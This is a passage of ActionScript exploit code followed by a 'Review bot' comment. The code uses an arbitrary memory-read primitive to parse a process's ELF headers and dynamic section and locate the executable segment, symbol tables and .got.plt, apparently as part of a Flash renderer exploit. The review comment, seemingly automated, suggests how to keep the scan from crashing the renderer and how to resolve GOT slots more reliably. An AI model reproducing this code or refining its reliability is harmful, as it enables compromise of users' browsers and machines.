entry = ph + (i * ph_esize)
p_type = e_ba.read(entry)
if (p_type == PT_DYNAMIC) {
seg_dynamic = base + e_ba.read(entry + 8)
seg_dynamic_size = e_ba.read(entry + 0x14)
return
}
}

throw new Error()
}

private function set_exec_segment():void
{
var entry:uint = 0
var p_type:uint = 0
var p_flags:uint = 0

for (var i:uint = 0; i < ph_size; i++) {
entry = ph + (i * ph_esize)
p_type = e_ba.read(entry)
p_flags = e_ba.read(entry + 0x18)
if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
seg_exec = base + e_ba.read(entry + 8)
seg_exec_size = e_ba.read(entry + 0x14)
return
}
}

throw new Error()
}

private function set_dynsym():void
{
var entry:uint = 0
var s_type:uint = 0

for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
entry = seg_dynamic + i
s_type = e_ba.read(entry)
if (s_type == DT_SYMTAB) {
sec_dynsym = e_ba.read(entry + 4)
return
}
}

throw new Error()
}

private function set_dynstr():void
{
var entry:uint = 0
var s_type:uint = 0

for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
entry = seg_dynamic + i
s_type = e_ba.read(entry)
if (s_type == DT_STRTAB) {
sec_dynstr = e_ba.read(entry + 4)
return
}
}

throw new Error()
}

private function set_got_plt():void
{
var entry:uint = 0
var s_type:uint = 0

for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
entry = seg_dynamic + i
s_type = e_ba.read(entry)
if (s_type == DT_PLTGOT) {
sec_got_plt = e_ba.read(entry + 4)
return
}
}

throw new Error()
}
}
}
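Review bot: `set_base` loops `while (true)` walking `addr` down one page at a time, so the `throw new Error()` after the loop is unreachable and, if no `0x464c457f` header is found, the scan walks into an unmapped page and crashes the renderer instead of failing cleanly; bound the walk (a maximum page count from the starting address) so the throw is reachable. Secondary: `external_symbol` derives a `.got.plt` slot index by counting `.dynsym` entries whose `st_info != 0x11`, which assumes `.rel.plt` order matches `.dynsym` order and that the slot has already been resolved (with lazy binding an uncalled import still holds its PLT stub address); a comment stating that assumption, or a fallback to the `symbol()` lookup, would help the next reader.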